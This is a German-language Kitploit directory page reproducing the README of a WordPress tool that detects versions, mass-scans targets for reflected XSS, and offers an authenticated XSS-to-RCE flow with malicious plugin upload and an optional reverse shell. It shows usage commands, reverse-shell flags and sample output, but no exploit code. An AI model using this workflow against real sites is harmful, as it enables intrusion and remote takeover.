Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
XSS2Shell-CVE-2026-64638 — WordPress-Sicherheitsscanner, der Versionen identifiziert, reflektierte XSS-Schwachstellen gleichzeitig auf mehreren Zielen erkennt und einen authentifizierten XSS-zu-RCE-Exploit-Workflow für autorisierte Tests unterstützt. | Kitploit
Tools/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
AufklärungWeb-SchwachstellenscannerExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

WordPress-Sicherheitsscanner, der Versionen identifiziert, reflektierte XSS-Schwachstellen gleichzeitig auf mehreren Zielen erkennt und einen authentifizierten XSS-zu-RCE-Exploit-Workflow für autorisierte Tests unterstützt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 11 TagenNoch nicht geprüft

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

Bug-Hunting-Methodik 2026

XSS2Shell Multi-Target Scanner

Entwickler: Credit: YogaGymn

PoC-/Scanning-Tool für autorisierte Sicherheitstests an WordPress. Das Projekt enthält einen Exploit-Ablauf für Einzelziele und einen nebenläufigen Nur-Scan-Modus für mehrere Ziele.

Wichtig: Verwenden Sie dieses Projekt nur auf WordPress-Installationen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben. Der Multi-Target-Scanner ist absichtlich auf Versionserkennung und Erkennung von XSS-Reflexion beschränkt; er führt gegen eine Zielliste keine Erfassung von Anmeldedaten, keinen Plugin-Upload und kein RCE durch.

Funktionen

Einzelziel-Modus

Das ursprüngliche Skript unterstützt:

  • Erkennung der WordPress-Version.
  • Erkennung von XSS-Reflexion.
  • Modi auto, xss und direct.
  • Direkten WordPress-Authentifizierungsablauf und Plugin-Upload.
  • XSS-Kettenfunktionalität aus dem ursprünglichen PoC.
  • Optionale Callback-/Reverse-Shell-Funktionalität aus dem ursprünglichen PoC.

Multi-Target-Modus

Der hinzugefügte Scanner unterstützt:

  • Einlesen von Zielen aus einer Textdatei.
  • Entfernen doppelter Ziele.
  • Nebenläufiges Scannen mit ThreadPoolExecutor.
  • Konfigurierbare Anzahl von Workern.
  • Erkennung der WordPress-Version.
  • Erkennung von XSS-Reflexion.
  • Fortschrittsbericht.
  • Ergebnisse, die in derselben Reihenfolge wie in der Eingabedatei gespeichert werden.
  • Zusammenfassende Statistiken.

Der Multi-Target-Modus ruft die ursprünglichen RCE-Funktionen nicht auf.

Anforderungen

  • Python 3.9+
  • requests

Installieren Sie die Abhängigkeit:

root@kitploit:~
python3 -m pip install requests

Wenn Ihre Linux-Distribution eine extern verwaltete Python-Umgebung verwendet, nutzen Sie eine virtuelle Umgebung:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

Installation

Klonen oder kopieren Sie das Projekt: Original-Exploit von yogaGymn

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

Oder legen Sie einfach:

root@kitploit:~
xss2shell.py

in Ihrem Arbeitsverzeichnis ab.

Multi-Target-Scanner

Erstellen Sie eine Datei namens targets.txt oder alvos.txt:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

Kommentare und leere Zeilen werden ignoriert:

root@kitploit:~
# Alvos de laboratório autorizado
https://example1.test

https://example2.test

Führen Sie den Scanner aus:

root@kitploit:~
python3 xss2shell.py -i targets.txt

Die Standard-Nebenläufigkeit beträgt 10 Worker.

Nebenläufigkeit ändern

Verwenden Sie beispielsweise 20 Worker:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

Für ein kleines Labor:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

Wählen Sie keine unnötig hohe Anzahl von Workern, da dies die Verbindungslast erhöhen und Rate-Limits oder defensive Kontrollen auslösen kann.

Ausgabedatei ändern

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

Beispielausgabe

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

Format des Ergebnisses

Die Standarddatei scan_results.txt verwendet tabulatorgetrennte Felder:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

Beispiel:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

XSS-Statuswerte


Status Bedeutung


XSS_REFLECTION_DETECTED Der Scanner hat das getestete HTML-Reflexionsverhalten erkannt. Dies ist für sich genommen kein Beweis für RCE.

XSS_NOT_DETECTED Die getestete Reflexion wurde nicht erkannt.

ERROR Bei der Prüfung ist eine Ausnahme aufgetreten.

XSS-Detailwerte

Der Scanner kann folgende Details melden:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

Diese Werte beschreiben die von der Erkennungsroutine beobachtete Antwort; sie müssen manuell validiert werden, bevor ein Ergebnis als bestätigte Schwachstelle betrachtet wird.

Verwendung mit einem einzelnen Ziel

Das ursprüngliche Skript unterstützt ebenfalls Argumente für ein einzelnes Ziel.

Automatikmodus

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Direkter Modus

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

XSS-Modus

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

Die XSS-/direkten Arbeitsabläufe können ein Plugin erstellen oder aktivieren, das Befehlsausführungsfunktionen enthält. Verwenden Sie sie nur in einer autorisierten Testumgebung.

CLI-Referenz

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

Argumente


Argument Beschreibung


target URL eines einzelnen Ziels.

-i, --input Datei, die mehrere Ziele enthält.

--output Ausgabedatei für Multi-Target-Ergebnisse. Standard: scan_results.txt.

--workers Anzahl gleichzeitiger Worker. Standard: 10.

--mode Ursprünglicher Einzelziel-Modus: auto, xss oder direct.

-u, --username WordPress-Benutzername für den ursprünglichen direkten/ Fallback-Ablauf.

-p, --password WordPress-Passwort für den ursprünglichen direkten/ Fallback-Ablauf.

--lhost Callback-/Reverse-Shell-Host für den ursprünglichen PoC.

--lport Reverse-Shell-Port. Standard: 4444.

--slug Plugin-Slug. Standard: xss2shell.

--callback-port Callback-Server-Port. Standard: 9090.

--no-rev Reverse-Shell-Auslösung im ursprünglichen Ablauf überspringen.

So funktioniert das gleichzeitige Scannen

Der Multi-Target-Modus nutzt das folgende Python-Feature:

root@kitploit:~
ThreadPoolExecutor

Jedes Ziel wird als unabhängige Scan-Aufgabe übermittelt:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

Die Ergebnisse werden gesammelt, sobald die Aufgaben abgeschlossen sind, während die endgültige Ausgabe in der ursprünglichen Reihenfolge der Ziele erzeugt wird.

Scope und Sicherheit

Der Multi-Target-Modus ist für autorisierte Sicherheitsbewertungen und Laborumgebungen konzipiert.

Empfohlener Arbeitsablauf:

  1. Holen Sie eine schriftliche Genehmigung ein.
  2. Nehmen Sie nur autorisierte Domänen/IPs in die Datei targets.txt auf.
  3. Beginnen Sie mit einer reduzierten Anzahl von Workern (Ausführungsprozessen).
  4. Analysieren Sie die Scanner-Ausgabe.
  5. Validieren Sie relevante Funde manuell.
  6. Dokumentieren Sie Beweise und Abhilfemaßnahmen.

Verwenden Sie den Scanner nicht ohne Erlaubnis gegen Systeme Dritter.

Einschränkungen

Der Scanner ist kein vollständiges Tool zur Schwachstellenbewertung.

Insbesondere:

  • Eine erkannte HTML-Reflexion beweist nicht automatisch das Vorhandensein einer ausnutzbaren XSS-Schwachstelle.
  • Die über öffentliche Endpunkte ermittelte WordPress-Version kann fehlen oder falsch sein.
  • Der Status unknown (unbekannt) bedeutet nicht, dass das Ziel verwundbar ist.
  • Netzwerkfehler können unvollständige Ergebnisse erzeugen.
  • Das Verhalten von WAF/CDN kann die Erkennung beeinträchtigen.
  • Der Scanner ermittelt im Multi-Target-Modus weder die Ausnutzbarkeit noch die Möglichkeit von RCE.
  • Ergebnisse müssen manuell überprüft werden, bevor eine Schwachstelle gemeldet wird.

Projektstruktur

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

Lizenz

Im bereitgestellten Quellcode waren keine Lizenzinformationen enthalten.

Wenn dieses Projekt öffentlich veröffentlicht wird, fügen Sie eine explizite Lizenzdatei wie LICENSE hinzu. Dieser Code ist eine Weiterentwicklung des ursprünglichen ZSecurity-Codes.

Tool herunterladen